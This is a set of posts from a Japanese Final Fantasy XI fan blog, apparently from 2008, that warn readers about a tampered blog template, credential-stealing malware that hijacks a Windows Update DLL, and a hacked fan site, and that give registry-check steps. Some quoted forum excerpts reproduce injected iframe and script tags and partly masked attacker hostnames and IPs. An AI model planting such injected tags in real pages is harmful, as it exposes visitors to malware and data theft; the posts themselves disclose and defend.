忍者ブログ
一匹の見習い黒ミスラが、ペット狩りでLv75を目指すブログ。
2024 . 03
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • プロフィール
    Profile
    カウンター
    最新CM
    [11/01 時空を超えた通りすがり]
    [10/17 時空を超えた通りすがり]
    [10/16 時空を超えた通りすがり]
    [05/31 つかさ]
    [05/08 ペルタ]
    [04/28 シコウ]
    [04/24 名無しのペット狩り]
    [04/12 最近踊り上げ始めたタルっ子]
    [04/08 白猫]
    [04/06 はごろも]
    [04/01 Azul]
    [03/31 とんろぶ]
    [03/28 chai]
    [03/23 黒樽とっきー]
    [03/21 ふるふるオレンジ♪]
    最新TB
    カテゴリー
    ブログ内検索
    リンク
    アクセス解析
    ×

    [PR]上記の広告は3ヶ月以上新規記事投稿のないブログに表示されています。新しい記事を書く事で広告が消えます。

    こ…こんにちわ…第七猫です…(´;ω;`)

    もう泣きそうです、のっけからスイマセン…

    表題の件の通り、遂に2度目の改竄が発生しました。
    付きまして緊急でプライベートモードに移行しておりました。

    週末の9/29(日)夕方、発見しました。
    大変申し訳有りません、そしてお手数ですが週末PCにてアクセスして頂いた
    皆様、ウイルススキャンを是非ともお願い致します。

    カスペルスキーオンラインスキャン

    今回、注入されていたスクリプトで落ちてくるウイルスは
    現在カスペルで検出可能みたいです。

    【どんな改竄が?】

    ・テンプレートヘッダに<script〜>が注入されており、
     1039045726:65535/jp●jsというアドレスへ不正にアクセスさせられる。

    またもや以前に起こった改竄と同じく、テンプレートを改竄し<script〜>
    用いて不正に上記アドレスへとアクセスさせる物です。

    FlashPlayerが最新で無い、ウィンドウズのバージョンが最新で無い方は
    至急バージョンアップをお願い致します…(´;ω;`)

    アクセス先と思われるアドレスの確認。

    1039045726(10進数)
      ↓
    3DEE945E(16進数)
      ↓
    61●238●148●94(2桁ずつ分解し、10進に展開しIP化)
      ↓
    061238148094●ctinets●com(IP→ホスト変換)

    (このアドレスには絶対にアクセスなさらない様にしてください。)

    こういう流れなのかな?うーん、ちょっと不明ですが…

    ログ

    ↑改竄が発覚した時のソース写し

    タイトルヘッダのスグ後ろに、<script〜>が挿入されています。

    【犯人の足取りに関して】

    今回の改竄に関して、某スレでも話に出ています戦士スキーさんのブログでの
    情報と同じく、当方のブログでも同じ様なアクセス痕跡が見られたので
    合わせてご報告致します。

    アクセスログ

    当方にて設置していますアクセス解析のログを見てみました。

    すると上記アドレスからの不正アクセス(らしい)痕跡が見られます。

    ホスト名: # OFSfb-10p2-211.ppp11.odn.ad.jp

    恐らくこれが犯人かと思われます。

    ちょっと分かり難いと思いますが、上記ログが指す意味は

    参照元: # http://blog91.fc2.com/control.php?mode=design

    というアドレスから

    http://blog91.fc2.com/

    へのアクセスがありましたよ。という物です。

    この参照元のアドレス:http://blog91.fc2.com/control.php?mode=design
    なんですが、このアドレスは通常管理者しかアクセスできない管理画面の
    アドレスを示しています。

    テンプレ編集画面

    このアドレスに私がアクセスすると、このテンプレート編集画面になります。

    即ち、OFSfb-10p2-211.ppp11.odn.ad.jpは何らかの方法を用いて管理画面に
    入りテンプレを編集した後、トップページへアクセスしているという訳です。
    (実際に編集画面まで入れているかは不明ですが…)

    また同様のアクセスログが他にも3〜4回見られますがその中で

    アクセスログ2

    これだけ明らかに、不明なコードと英数字の文字列(?)が見られました。

    >http://blog91.fc2.com/control.php?mode=
          setting&process=1&cr=28f2f9文字列c5a68ad5f

    (文字列には半角英数字が入っています)

    通常、管理画面から普通にログインするだけでは、process=1以降の

    >&cr=28f2f9文字列c5a68ad5f

    という物は現れないハズ…というか、何でしょうかこれは…(汗

    >http://blog91.fc2.com/control.php?mode=setting&process=1

    というアドレスは「管理画面の環境設定」のページを示しますが、その後の
    コード「&cr=28f2f9文字列c5a68ad5f」が何を指すのか第七猫には理解不能
    でした…(´・ω・`)

    キャリッジリターンっぽい記述ですが、ウィンドウズの場合はラインフィールド
    (LF)との組み合わせで改行だったような?

    この長い文字列も16進→10進変換で…と思ったんですが、桁数多くて
    良く分かりませでした…

    第七猫の拙い知識ではココが限界でした、本当すいません…(´;ω;`)

    もし何かしらの情報あればコメント頂けるとありがたいです。

    【現在の対応について】

    ・取り合えず上記の<script〜>の記述を削除済み。
    ・FC2IDのパスワード変更済み。
    ・FC2へ上記を連絡し、回答待ち。


    という状況になっています。

    …が、正直ココまで来ると管理がどうしても後手に回る可能性が非常に大です。

    大変お手数ですが、アクセスされる場合は各自で安全性をお確かめ下さいます様
    宜しくお願い申し上げます(´;ω;`)

    【各ブログ、サイト管理者様へ】

    すいませんが、当サイトへのリンクは各管理者様の判断の元切って頂く等の
    処置を行って下さって結構です。

    大変悲しい事ですが、流石に事態が事態です(´;ω;`)
    何より皆様のアカウントを大切に考えると致し方有りません。

    FF11と同じ位楽しみにしていたブログですが、こんなに大変な事態を
    引き起こすのでは存続を含め、今後の事も検討中です。

    またFC2からの何らかの回答あれば、情報発信します。

    この度はご迷惑をお掛けしまして、見に来て頂いております皆様に
    大変なご心配をお掛けしました事、深く謝罪したいと思います。

    本当に、本当に申し訳有りません。

      〜 08年09月29日 第七猫 〜
    PR
    皆さん、週末如何お過ごしでしょうか?第七猫です、こんにちわ!( ^ω^)

    またしてもこのエントリーが登場するハメになりました…(´・ω・`)
    最近、公式の方でもこのような発表があったのを見てらっしゃると思います。

    プレイオンラインへの一部接続元からの接続制限について

    どうやら以前、FC2でも起こったテンプレ改竄からのアカウントハックですが
    最近別経緯からの猛威を振るっているらしく、被害報告が多発しています!
    (´;ω;`)ブワッ

    今回、何故そのような状況になっているのか?

    現時点で、感染経緯までの特定には至っておりませんがウィルスの概要が
    判明したらしくマズは情報をアップして注意発起を。
    特にPC版でプレイされている方は必ず確認を宜しくお願い致します。
    ヽ(´Д`;)ノアゥア...

    記事を書くにあたり、大変参考にさせて貰いました

    ●● RMT業者の垢ハックが多発している件28 ●●

    のスレ住人の有志の方に、この場を借りて感謝を。

    【今回のウィルスの脅威】

    ・各種アンチウイルスソフトで検出が不可能(7/13に一部対応済み)
    ・現時点で感染経路が不明確(Flashplayerの脆弱性が狙われた可能性大)
    ・パスワードの保存、手動入力等関係無しで被害に遭う
    ・IDやパスの定期的な変更も効果無し


    以上の点が挙げられます!

    ウイルスソフトで検知不可能な上、パスワードを手動入力し定期的な変更を
    していても被害に遭うというのは、考えるだけで恐ろしい…

    【感染の前兆】

    特に報告の多かった、アカウントハックの被害者からの報告で共通のPCの
    挙動として挙げられたものは以下。

    ?POLの強制終了
    ?WindowsUpdateの失敗
    ?Windowsのシャットダウンの遅延


    等の報告が多く見られたようです。

    皆さん、思い当たる節は無いでしょうか?

    【どういったウィルスなのか?】

    概要は

    ●POLの接続先をスクエニから、

    罠サーバーへ変更する。


    という恐ろしい物…((((゚Д゚;))))ガクガクプルプル

    つまり入力したパスワードとIDが、そのまま不正な接続先へ送信される。
    しかもPOLからの送信なのでファイアーウォールやPG2等でも
    食い止める事が難しい…

    以下、某スレを転載。分かる範囲で見てください。

    >★wuauserv.dllがwzcsvbxm.dllに改ざんされていた件 暫定まとめ改訂案
    >
    >wuauserv.dll(ウィンドウスアップデートに使われるダイナミックリンクライブラリ)の
    >レジストリを、正規のプロセスC:WINDOWSSystem32svchost.exeを使って罠サイトへ
    >パスを送るwzcsvbxm.dllに書き換える。
    >
    >ファイルからではなくプロセスをフックしてメモリからパスを送信。送信経路はhttp。
    >(レジストリの不正更新もあるにもかかわらず)ほとんどのセキュリティソフトは未検知。
    >7/13付けで検体爆撃済み かたじけのうござる。
    >
    >判明している送信先(置き換えではなく●を単純に削る)
    >引退:wowint●erfcae.com 204.13.6●4.0 - 204.13.71.255
    >現役:googlesy●dition.com 74.86.1●85.101
    >
    >【%SystemRoot%System32wzcsvbxm.dllを探す方法。】
    >スタート→ファイル名を指定して実行→regedit
    >HKEY_LOCAL_MACHINE→SYSTEM→ControlSetxxx(xxxは数字)
    >→Services→wuauserv→Parametersと
    >HKEY_LOCAL_MACHINE→SYSTEM→CurrentControlSet→Services→wuauserv
    >→Parametersの中の「ServiceDll」→「REG_EXPAND_SZ(種類)」の「データ」を確認
    >
    >C:WINDOWSsystem32wuauserv.dllならそのままクローズ(この件の感染はしていない)
    >C:WINDOWSsystem32wzcsvbxm.dllなど上記以外のファイルが登録されていた場合、
    >感染している可能性が極めて大 まず安全な環境でパス変更。
    >
    >wzcsvbxm.dllをwuauserv.dllに書き換えられるなら書き換え 等の対策をする。
    >ただし すぐに戻ってしまう報告もあるため 修正後要確認。
    >
    >本体(生成元)および感染ルートは現状不明なため、上記の修正をしたとしても
    >完全に駆除されているか分かりませんので、
    >
    >感染が確認された場合は『クリーンインストール推奨』。


    という一時報告が見られましたが、更に以下へ修正追記。

    >★wuauserv.dllがwzcsvbxm.dllに改ざんされていた件 現状まとめ(>>653の挙動周り修正)
    >
    >【レジストリ】
    > WindowsUpdateで使用するAutomaticUpdatesサービスのエントリを改竄する。
    > ・キー位置
    >  HKEY_LOCAL_MACHINESYSTEMControlSetxxx(xxxは数字)ServiceswuauservParameters
    >  HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauservParameters
    > ・感染時エントリ(値)
    >  %SystemRoot%system32wzcsvbxm.dll
    >  (未感染Windowsでは%SystemRoot%system32wuauserv.dll)
    > wzcsvbxm.dllはAutomaticUpdatesサービスとしてOS起動時に常駐すると考えられる。
    > エントリを書き換えた場合、常駐しているwzcsvbxm.dllが再度書き戻しにくるようだ。
    >
    >【POL】
    > wzcsvbxm.dllはAutomaticUpdatesサービスとして常駐しているwzcsvbxm.dllは
    > svchost(wuauser)としてPOLのプロセスに介入し処理を乗っ取る。
    > svchost(wuauser)の介入がなされた時点でPOLの接続先が□e鯖から業者鯖に
    > 変更されていると考えられる。
    > 乗っ取ったPOLのプロセスを使用して業者鯖にID/PASSを送信する。送信後異常終了?
    > そのため、ファイアヲールなどでPOLの接続ルールをアプリケーション単位で
    > 許可している場合は検知は難しい。
    > 現時点で確認されている送信先(置き換えではなく●を単純に削る)
    > ・wowint●erfcae.com 204.13.6●4.0 - 204.13.71.255
    > ・ooglesy●dition.com 74.86.1●85.101
    (←Googlesyのコピペミスと思われます)

    【つまりどういう事?】

    第七猫のINTよん?の頭で分かる範囲で概要を説明すると…

    ?とある感染源からウィルスに感染
       ↓
    ?WindowsUpdate機能のdllを改竄し、その後起動したPOLのプロセスを乗っ取る。
       ↓
    ?本来ならスクエニに繋がるはずのPOLは、罠を仕掛けた犯人の鯖へ接続。
       ↓
    ?POLからID/PASSを犯人の鯖へ送信し、送信後異常終了させる。。


    という流れらしいです…((((゚Д゚;))))ガクガクプルプル

    やってる本人にしたら

    「あれ?POLがシャットダウンした?まぁいいか。もう一回起動…っと。」

    って感じで、気づかない人はスルーしてしまう勢いですよね…

    つまり報告にあった異常内容である

    ?のWindowsUpdateのdllを改竄している→WindowsUpdate失敗

    ?のPOLからID/PASSを送信し、送信後異常終了。→POLの異常終了


    という報告と一致する…
    なんとなく…納得できますね…恐ろしい…(´;ω;`)ブワッ

    WindowsUpdateの機能を改竄し、POLの接続先を罠サイトへ指定する。

    この恐ろしいプロセスが実行されている危険があるようです!!
    ((((゚Д゚;))))ガクガクプルプル

    この現象が見られた場合は、至急以下のチェックをされる事を強く勧めます。
    ヽ(´Д`;)ノアゥア...

    ちなみに転載中の記事にもありますように、一番恐ろしいのは

    >(レジストリの不正更新もあるにもかかわらず)ほとんどのセキュリティソフトは未検知。

    という一文。現在カスペルスキーにて検出が可能(7/13付け)らしいですが
    Windowsシステムファイルのふりをしているので駆除できないようです。

    検出のみならこちらでも可能な様ですので、心配な方はチェックを。

    カスペルスキーオンラインウィルススキャン

    【至急チェックすべき内容】

    細かい内容までは把握できなくとも、なんとなく分かって頂けましたか?
    では、そのような現象が起こった場合何を確認すればいいのか?

    また過去に起こったかもしれないけど、ハッキリ覚えてない…という方は
    以下のチェックを大至急実施する事を、強くお勧めします。
    ヽ(TДT)ノ

    ●不正レジストリの検索

    まず、スタートメニューから「ファイル名を指定して実行」を選択。

    ファイル名指定

    ここをクリックすると、下のようなダイアログボックスが現れます。

    regedit

    「regedit」と入力しリターンを押しましょう。

    レジストリエディタ

    そうすると、このような【レジストリ エディタ】が開きます。
    普通にPCに触るだけの方だと馴染みの無いエディタで、ややこしいですが
    頑張りましょう。(・∀・)b

    まずは

    HKEY_LOCAL_MACHINE→SYSTEM→ControlSetxxx→Services→wuauserv→Parameters
    (xxxは数字)を探す。

    001へ

    よし、じゃ順に見て行きましょうか。

    ?のHKEY_LOCAL_MACHINEの+をクリック。

    すると、その下のフォルダが見れますのでその中の?SYSTEMをクリック。

    そうすると、?ControlSetxxxというのが「001」と「002」というのが
    あったので取り合えず「001」から見て行きます。

    001−2

    「001」を開くと?Servicesがありますので、それの+をクリック。

    ?Servicesの下にはフォルダが一杯ありますが、アルファベット順に並んで
    いるので、ずーっと下へ移動して行きましょう。

    001−3

    ?wuauservなので、最後の方にあると思います(・∀・)

    見つけたら?wuauservの+をクリックして、その直下の?Parameters
    ?クリックしてみましょう。

    そうすると、エディタの右側の欄に「ServiceDll」というダイナミック
    リンクライブラリがあるので、その中の「データ」の部分をチェック。

    >C:WINDOWSsystem32wuauserv.dll がある場合 → ○感染無し。
    >C:WINDOWSsystem32wzcsvbxm.dll 等それ以外 → ×感染の恐れ大

    〜080729追記〜
    WindowsVistaをお使いの方は「wuaueng.dll」となり、これで感染無しです。
    〜〜ここまで〜〜

    となります。((((゚Д゚;))))ガクガクプルプル

    幸い第七猫のPCは「C:WINDOWSsystem32wuauserv.dll」となってます。

    これと同様に、先ほどの?ControlSetxxxの002も確認してみましょう。
    同じ様なフォルダ構成になっていますので、簡単に見つかると思います。

    002−1

    「002」のフォルダを開き、Servicesを開きましょう。

    同様に沢山のフォルダの最後の方にある「wuauserv」を探します。

    002−2

    見つけたwuauservを開いて、その直下のParametersをクリック。

    そうすると、右の欄に同じ様なデータ「C:WINDOWSsystem32wuauserv.dll」
    が見られますのでここも確認ですね。

    どうやら2つとも「wuauserv.dll」だった模様…ヽ(´Д`;)ノふぅ…

    さて、xxx(数字の部分全て)を見終わったら残るは↓

    >HKEY_LOCAL_MACHINE→SYSTEM→CurrentControlSet→Services→wuauserv
    >→Parameters

    こっちも見ないといけません。

    cont−1

    同じ様に、001、002と同列の中に「CurrentControlSet」があるので開く。
    すると中に「Services」がありますね!これを開くとまた大量にフォルダが
    あるので、下の方を探しましょう。

    cont−2

    wuauserv→Parametersと開くと、右の欄に同じ様なdllのデータが見られます。

    これも無事「wuauserv.dll」だったか…

    以上の確認が出来れば、今回のウィルスには感染していないと思われます。

    万が一、wuauserv.dll以外の物が登録されていたり、wzcsvbxm.dllという物が
    見られた場合は感染の可能性大です!!ヽ(´Д`;)ノアゥア...

    【万が一感染が確認された場合】

    今回のウィルスで一番厄介なのが、Windowsのレジストリを改竄している!
    という所。(;^ω^)b

    つまり修正しようと思った場合、

    ?セーフモードでPCを起動し、レジストリをいじれるだけの知識が必要。

    ?これを実施したとしても、完全に駆除できるとは限らない。


    という2点が挙げられます…(´・ω・`)

    特にOSのレジストリという部分をいじるので、最悪PCが起動不能になったり
    動作異常を起こすきっかけになりかねませんので、ここで簡単に説明を
    出来るレベルじゃねーぞッ!って事です…

    (´;ω;`)ブワッ

    しかも危険を冒してレジストリ修正しても、100%じゃないとすると…

    「感染が見られた場合は、クリーンインストール」

    これしかありません…ヽ(´Д`;)ノアゥア...

    正直、PCをサラにしてもらうのが一番確実です…

    【今後どうすればいいのか?】

    一番恐ろしいのが、現時点でウィルス感染の経路が明確になっていない。
    という所…((((゚Д゚;))))ガクガクプルプル

    これが一番恐ろしい…今後、被害が拡大する恐れが十分あります。

    恐らくですが、「Flashplayerの脆弱性」が狙われている可能性もあるようです
    ので、もし「Flashplayer」をインストールされている場合はアンインストール
    検討頂くのが良いかもしれません(´・ω・`)

    第七猫のPCも、テンプレ改竄以来Flashplayerは入っていません(汗

    しかしこれ以外にも感染経緯がある可能性は、十分考えられますのでお使いの
    PCのアップデートや、ウイルス駆除ソフトの更新等は忘れずに実施されるのが
    まずは必要かと考えます。

    正直、一部広告から云々かんぬんという報告も考えると…

    ●FFをするPCではウェブ閲覧を控える

    ●余計なソフトはインストールしない

    というのが、最大の防御策でしょうかねぇ…ヽ(´Д`;)ノアゥア...

    もうね…いい加減にした方が良い(#^ω^)ビキビキだお…

    *文中に誤記、修正必要箇所ありましたらコメント頂けると幸いです。
    なさん、とうとうモグボナンザの当選発表が有りましたねッ!!(・∀・)9m

    ッキーな当選者が全サーバーに56人居るみたいですが、遂に第七猫もレアなアイテムを

    に入れる時がきたようだなッ!!ログインしチェックした数字とボナンザのナンバーを

    らし合わせてドキドキの瞬間。すでに調べ終わってハズれたフレが、おもむろに第七猫に

    と言って来るが可哀想で仕方が無い。第七猫程の運の良さがあれば当選確実。

    も何が当たったかは、そう簡単には教えられない。第七猫が当たった物を聞いたら皆

    っとの嵐で頭がおかしくなって死ぬ。これは確定的に明らか。( ^ω^)

    ぶん第七猫が当たった物聞いたら、マジでビックリしてお茶とか噴くよ?良いの?






     (´;ω;`)ブワッ

    第七猫

    サル突入直前の第七猫。ホマム手ゲット記念にパシャリ(・∀・)
    今北、こんにちわ!第七猫です!( ^ω^)ノ

    昨日、非公開コメントにて情報を頂いておりましたが出先だったので
    遅れてしまいました!ヽ(;´Д`)ノ
    既に某掲示板やえふめもさんの掲示板にも注意発起が書かれています。
    かなりメジャー所のHPなだけに、目を疑いたくなりますが…

    現在では、管理人様の対応により対応は済みとの事です(・∀・)b

    ・Vana'diel Monsters 様
    (ttp://ff11.s33.xrea.com/index.shtml)

    いわずと知れた通称ヴァナモン様Σ(゚д゚)

    以前の記事で、ヴァナモン様のブログが改竄され管理人の知らない所で修正
    FC2が独自で修正したらしく、事後報告があったそうです)
    されたという事がありましたが…

    今回はなんと通常のHPの方が改竄されたらしいです!!
    Σ(゚Д゚;≡;゚д゚)?

    ?発見。

    以下、某掲示板を抜擢。

    >ソース見てみた。ヴァナモンひらいてメニューがでてくるがその一番上の
    >エリア別モンスターデータのリンク先にインラインフレームが埋め込まれてて
    >その先でs111●cnzz●com/に飛ばされてる。
    >アーガスでみたら北京のサイトだった。
    >インラインフレーム有効にしてるブラウザで見ないほうがいいね。


    >エリア別モンスターサーチのリンク先の
    >エリア別詳細 と書いてある左上のフレームに
    ><iframe src=top■htm height=0 width=0></iframe>
    >が仕込まれてる。top.htmはクラッカーが仕掛けたであろうページで
    ><script src='http://s111■cnzz■com/stat■php?id=508863&web_id=508863'
    >language='JavaScript' charset='gb2312'>
    >がさらに仕込まれている。


    どうやらエリア別詳細から飛べるHPの一部を改竄し、が仕込まれた
    ページへと飛ぶ仕掛けらしいです!

    送り先は毎度お馴染み、s111■cnzz■com (#^ω^)ビキビキ…

    ?管理人様からのコメント抜擢

    >名前:ヴァナm ◆ZrzGMHfgII [] 投稿日:2008/04/29(火) 13:49:22.80 ID:usez71CN
    >完全にハックされてるが普通に考えてヤバい。想定外
    >ブログとは全く違うパスワードなのに
    >4/27 23:26-23:31の間に3つのファイルが書き換えられていた。
    >該当の3ファイルは今削除した
    >接続パスワードは変更されていなかった。
    >ちなみにFC2のブログは数日前に停止した。
    >xreaにメール送る


    どうやら4/27(日)23時30分以降、不審な改竄の後が見られ
    3つのファイル書き換えが行われていた様子です!
    ((( ;゚Д゚)))ガクガクブルブル

    そして4/29(火)13時過ぎには対処済みとの報告が。

    もし4/27(日)23:30〜4/29(火)13:00までの
    期間でヴァナディールモンスター様を閲覧した方が居ましたら、至急PCの
    ウィルスチェックを実施される事をお勧め致します。

    ?今回の罠の内容。

    >・以下の情報をcnzz■comにIMGタグのオプションとして送る
    > navigator.userAgent ユーザーエージェント取得
    > document.referrer リンク元URL
    > navigator.appName ブラウザ識別(IE ネスケ等)
    > navigator.systemLanguage システム言語
    > navigator.platform プラットフォーム識別(Win32 MacPPC等)
    > navigator.appVersion ブラウザ識別(IE version等)
    > screen.width 画面幅
    > screen.height 画面高さ

    どうやら今回アクセスさせられるアドレスでは、以上の情報を抜き取られて
    送信させれられるっぽいです。((( ;゚Д゚)))ガクガクブルブル

    直接POLのID、パスを抜く物では無いらしいです。

    ?つまり…?

    フレやLSメンに情報を回して、ウィルススキャンや注意発起を!
    特に利用者の多いサイト、そして日時ですので…
    もし回りに知らずに利用していた方が居た場合、パス変更+ウィルススキャン
    薦めてください!

    ブログ以外でもいよいよ手口が広がって来たのでしょうか…(´・ω・`)
    通常のHPの部分で改竄が見られると…今後の拡大が恐ろしいですね…

    こうなってくると流石に手が広がりすぎて、はっきり言って全てに対処が
    非常に困難です、後手になりがちです。
    特にGWに入り、休日が続きますので警戒を怠らないようにしてください!
    (´;ω;`)ブワッ

    以下、要チェック!

    ・Windows最新ヴァージョンにアップデート。
    ・RealPlayer最新版へのアップデート、もしくはアンインストール。
    ・ウィルスソフトの最新版へのアップデート。
    ・インラインフレーム、JavaスクリプトのOFF。


    特にウィルス感染経緯は、上記の上から2つが主ですので必ず実行を
    お願いいたします。(`・ω・´)b

    しかし今回はコメント頂いてたのに、記事アップが遅れてしまって
    申し訳無いです〜ヽ(;´Д`)ノ
    GW恐ろしいなぁ…別の意味で(笑

    お世辞にも安心とは言えないので、罠が多発する可能性が高いと思われる
    連休中は、極力FF11の入っているPCでのウェブ閲覧を控えられるのが
    良いかと思います((( ;゚Д゚)))ガクガクブルブル

    サイトやブログによっては、携帯で閲覧可能な所もありますのでもしどうしても
    という事であれば、携帯で覗いてみてください!(・∀・)b
    ちなみにFC2ブログであれば、大抵が携帯閲覧に対応しております。

    ↓ちなみに以下、ヴァナモンさん騒動最中に投下された怪しいアドレス。

    >557 名前:既にその名前は使われています 投稿日:2008/04/29(火) 〜
    >?
    >もっと詳しく知りたい奴はここ見てくれ
    >●● RMT業者の垢ハックが多発している件14 ●●
    >hxxp://yy65■60■kg/monci/


    あの流れでサクッと張られていますが…

    よく見たら見慣れないアドレス、しかもAguseでチェックした所どうみても
    罠の掲示板へ飛ぶようです!ヽ(`Д´)9m

    飛ぶ前に必ずソース先をチェックする癖をつけましょう…(´・ω・`)
    折角のGW、もっとゆっくり楽しく遊びたいよね!
    ちっくしょうぅぅぅうう!(´;ω;`)ブワッ

    ちょっと乗り遅れましたが(汗
    一旦記事にしてアップしてみました。
    誤字、修正、追加等ありましたら、コメントにてご指示をお願いします。
    こんにちわ、第七猫です( ^ω^)

    2月末に当ブログから発覚し、その後数多くのブログ様で同じ様な被害が
    発生しております「FC2テンプレートの改竄」に関して。

    朗報(?)があったので、今現在書き掛けのエントリーを一旦中止して(笑
    これを緊急でアップします。
    特にFC2ブロガーの皆様、そして読みに来て頂けて居ます皆様。

    遂にFC2公式からの正式発表が有りました!!ヽ(`Д´)9m

    以下を参照下さい。
    (FC2が発信しています、ブログ管理者に向けたお知らせ用ブログです。)

    〜〜 ブログ管理者用お知らせ 〜〜
    現在の対応状況に付きまして(4/17)
    不正ログイン対策対応状況につきまして(4/17)
    〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜

    上記エントリー2つに、今回のテンプレ改竄だと思われる内容の報告がアップ
    されております(`・ω・´)シャキーン

    まず、「現在の対応状況に付きまして」のエントリーから一部抜擢。

    報告1

    機能の改良点や仕様変更点がズラッーと告知されていますが…

    その下の文章!注目ッ!!Σ( ̄ロ ̄)9m

    報告2

    おおおお!なんかそれっぽい内容の報告を別途しますよとの告知がッ!!

    「不正ログイン」と記されたこれは…もしかして…(;^ω^)ゴクリ…

    この告知からまさに1〜2時間後位でしょうか。

    次の「不正ログイン対策対応状況につきまして」のエントリーがアップ!
    この別途詳細を…の内容が遂に報告されましたヽ( ゚∀゚)/

    以下、内容の抜擢!!注目!!

    報告3

    おおおおお!ページ改ざんとある!まさにソレだッ!!ヽ(`Д´)ノ

    って「報告が遅くなり…」て、遅すぎるよーヽ(´Д`;)ノアゥア...

    報告4

    2月から頻繁に発生は良いとして、11月からのも分かってた訳ですk(汗

    オンラインゲームを取り扱うブログ中心。となれば間違い無いでしょう。

    で、肝心の対策はというと…!

    報告5


    ほう、FC2での対策は概ね完了しており今現在も検証が進んでいる…と。

    ひとまずFC2側で現象の確認、対策が実施されているみたいでとりあえず
    ですが一安心という所でしょうか。

    しかしまだ納得行かない…というか明確じゃないなぁと個人的に思う事。

    ?結局、何が原因で不正ログイン出来たのか?

     →できればもう少し詳細な情報が欲しい。何が原因だったのか?
      が明確に分からない点。FC2システムが原因なのか?


    ?青線で書いてある所ですが、以下の2通りの解釈が出来るのですが…

    「不正アクセスされやすい対象としてましては…」という分に対し、この文の
    「不正アクセス」とは何を指すのか?


     →1.FC2IDに不正アクセス。よってブログ改ざんを受けますよ。

        つまり管理者のセキュリティの甘さを指摘しているのでしょうか?
        この場合、被害を受けるのはブログ自身。


     →2.自PCに不正アクセス。よって色んな個人情報が抜かれますよ。

        つまり改ざんされたブログを踏んだ後、ウィルスを感染させられ
        不正アクセスを受け、色んな情報が漏れる事を指しているのか?
        この場合、被害を受けるのは閲覧者。


    どっちの事を指して言っているんでしょう?(;^ω^)?

    なんというか…いまひとつスッキリしない内容ですが…

    なにはともあれ、一応FC2からの発表がありました。

    そして対策を取り、それ以降不正アクセスは見られないとの事です。

    どこまで信用出来るモノか…不安は残りますが…(´・ω・`)
    (対応の遅さからも、信頼性は低くても仕方ないですよね…)

    ま、個人的に一番納得がいかなかったのは…

    不正アクセスを受け、改ざんがあった事に対するお詫びが一言もなかっt(爆
    \(^o^)/

    報告が遅れた事に対してのお詫びはありましたが…

    改ざんが発生した事に対してFC2からの

    「ご心配、ご迷惑をお掛けしまして、大変申し訳ありませんでした。」

    くらいの一文があっても良かったんじゃないかな?と思う次第です。
    責任は感じてくれて…ますよね?(;´д`)ゞ

    尚、今回の件に関して偶然かもしれませんが…

    実は第七猫さん、あまりにもFC2からの報告が無く(#^ω^)ビキビキだお…
    流石にストレスがマッハになったので(笑
    ちょっと強気に以下のメールを4/15に送った所でした。

    >FC2ブログを利用させて貰っています第七猫と申します。

    >ブログのテンプレート改竄の件に関しまして、前回3/17に
    >問い合わせのメールを入れてから1ヶ月、改竄が発覚した問い合わせから
    >凡そ1.5ヶ月が経っております。
    >しかし未だに公式からの正式発表、並びに調査結果、対策等の告知が
    >まったくありません。
    >どうなっていますでしょうか?

    >以下、FC2フォーラムにも以下のスレッドが立っておりますので
    >必ずご一読を宜しくお願い致します。
    >http://blog.fc2.com/forum/viewtopic.php?t=20829
    >ここは基本的にユーザー同士の情報交換がメインの所ですので
    >基本的に御社が見る必要は無いと思いますが、このスレッドは必ず目を
    >通してください。

    >発生より既に1.5ヶ月。調査中ですので…という回答メールより
    >事実確認をされている事は確かだと思います。
    >調査がたとえ途中だろうと、原因・対策が不明だろうと構いませんが
    >公式からのテンプレ改竄の事実を正式発表をお願いします。
    >(もちろん調査結果等あれば尚良いですが)

    >特に今回ターゲットとなったオンラインゲーム「FF11」に関する
    >多くのFC2ブログ様は、御社の対応の状況からブログの閉鎖、もしくは
    >別のブログサービス様への移転を行われているようです。

    >4/25(金)までに公式でのテンプレート改竄に関する発表を
    >お願いしたいと思います。
    >(事実発覚から2ヶ月経過にもなるタイミングです。)

    >万が一その期日までに返信なり、公式発表が無い場合は御社はこの件に関し
    >「公式発表・調査報告・対策実施の意思は無い」物と判断させて頂きます。

    >黙って見過ごす事の出来ないレベルの問題だと言う認識をお願い致します。


    あまり苦情ばかりを書いても反応無いだろうと、とりあえず要点だけ

    そして勝手に4/25と期限を区切り、催促してみました。
    こういうのって期限が無いとダラダラ行っちゃうんですよねぇ(´・ω・`)
    期限までに何も反応無ければ…とハラくくってました。

    タイミング的に丁度良かったのか分かりませんが、公式(?)の発表が来て
    一安心です。

    アレ以降毎日欠かさず、ブログソースのチェックを行っています(´;ω;`)ブワッ
    そんな同じ思いをしているブロガーの皆様、そして見に来て頂けてます皆様へ。

    とりあえずFC2の動きが見えたので、速報でした!ヽ( ´;ω;`)/

    さ、本来のエントリーの仕上げに掛からないと(笑
    前のページ HOME 次のページ
    Copyright © FF11 ペット狩り黒猫奮闘記 All Rights Reserved
    Powered by ニンジャブログ  Designed by ピンキー・ローン・ピッグ
    忍者ブログ / [PR]